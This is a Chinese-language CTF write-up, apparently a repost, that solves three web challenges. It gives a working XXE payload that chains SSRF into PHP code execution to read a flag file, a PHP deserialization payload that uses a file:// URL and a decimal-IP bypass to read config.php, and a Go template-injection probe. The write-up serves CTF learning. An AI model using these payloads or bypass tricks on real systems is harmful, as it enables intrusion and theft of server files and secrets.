内容简介:根据URL可以猜测存在任意文件下载漏洞并且hash值为file的md5加密,根据提示下载源码在路由文件中发现几个关键点
Bad Injections
根据URL可以猜测存在任意文件下载漏洞并且hash值为file的md5加密,根据提示下载源码
在路由文件中发现几个关键点
跟进这个类发现存在XXE
这里想到还有一个只能通过SSRF才能访问到的admin,于是跟进admin文件发现存在代码执行
于是想到利用XXE来构造这个代码执行,这里要注意的是服务器出现 }
就会报 parser error : Invalid URI
,所以我们需要编码一下。最终payload
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ENTITY xxe SYSTEM "http://localhost/admin?rss=http://www.lovei.org/sitemap.xmlℴ=%6c%69%6e%6b%29%3b%7d%73%79%73%74%65%6d%28%22%63%61%74%20%2f%64%61%30%66%37%32%64%35%64%37%39%31%36%39%39%37%31%62%36%32%61%34%37%39%63%33%34%31%39%38%65%37%22%29%3b%2f%2f" >]> <root> <name>&xxe;</name> </root>
Vice
题目思路应该蛮明确反序列+SSRF,这里有几个限制所以我们使用file协议读文件, 127.0.0.2
绕过 127.0.0.1
的检测,然后将ip十进制编码绕过 .
检测最后进入URL编码
<?php class SHITS{ private $url; private $method; function __construct(){ $this->method = "doit"; $this->url = "file://2130706434/var/www/html/config%2ephp"; } } $a = new SHITS(); echo urlencode(serialize($a)); ?>
最终payload:
http://68.183.31.62:991/?gg=O%3A5%3A%22SHITS%22%3A2%3A%7Bs%3A10%3A%22%00SHITS%00url%22%3Bs%3A43%3A%22file%3A%2F%2F2130706434%2Fvar%2Fwww%2Fhtml%2Fconfig%252ephp%22%3Bs%3A13%3A%22%00SHITS%00method%22%3Bs%3A4%3A%22doit%22%3B%7D
Super-easy web dog
这道题一开始没做出来,最后知道真相的我眼泪掉下来
看到这个之后果断跑去题目试了 {{$.Request}}
然后???然后这就出来了?眼泪掉了下来
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 你负责人工智能哪部分?人工那部分;知识图谱的构建主要靠人工还是机器?
- cocosdx接bugly,上传符号表,有一部分内容解析出来了, 另一部分没有解析出来
- GO的部分总结~
- MySQL基础部分总结
- python字典实例(部分)
- DDCTF2018 部分writeup
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Ajax开发精要
柯自聪 / 电子工业出版社 / 2006 / 45.00
书籍目录: 概念篇 第1章 Ajax介绍 2 1.1 Ajax的由来 2 1.2 Ajax的定义 3 1.3 Web应用程序的解决方案 5 1.4 Ajax的工作方式 7 1.5 小结 8 第2章 B/S请求响应机制与Web开发模式 9 2.1 HTTP请求响应模型 9 2.2 B/S架构的请求响应机......一起来看看 《Ajax开发精要》 这本书的介绍吧!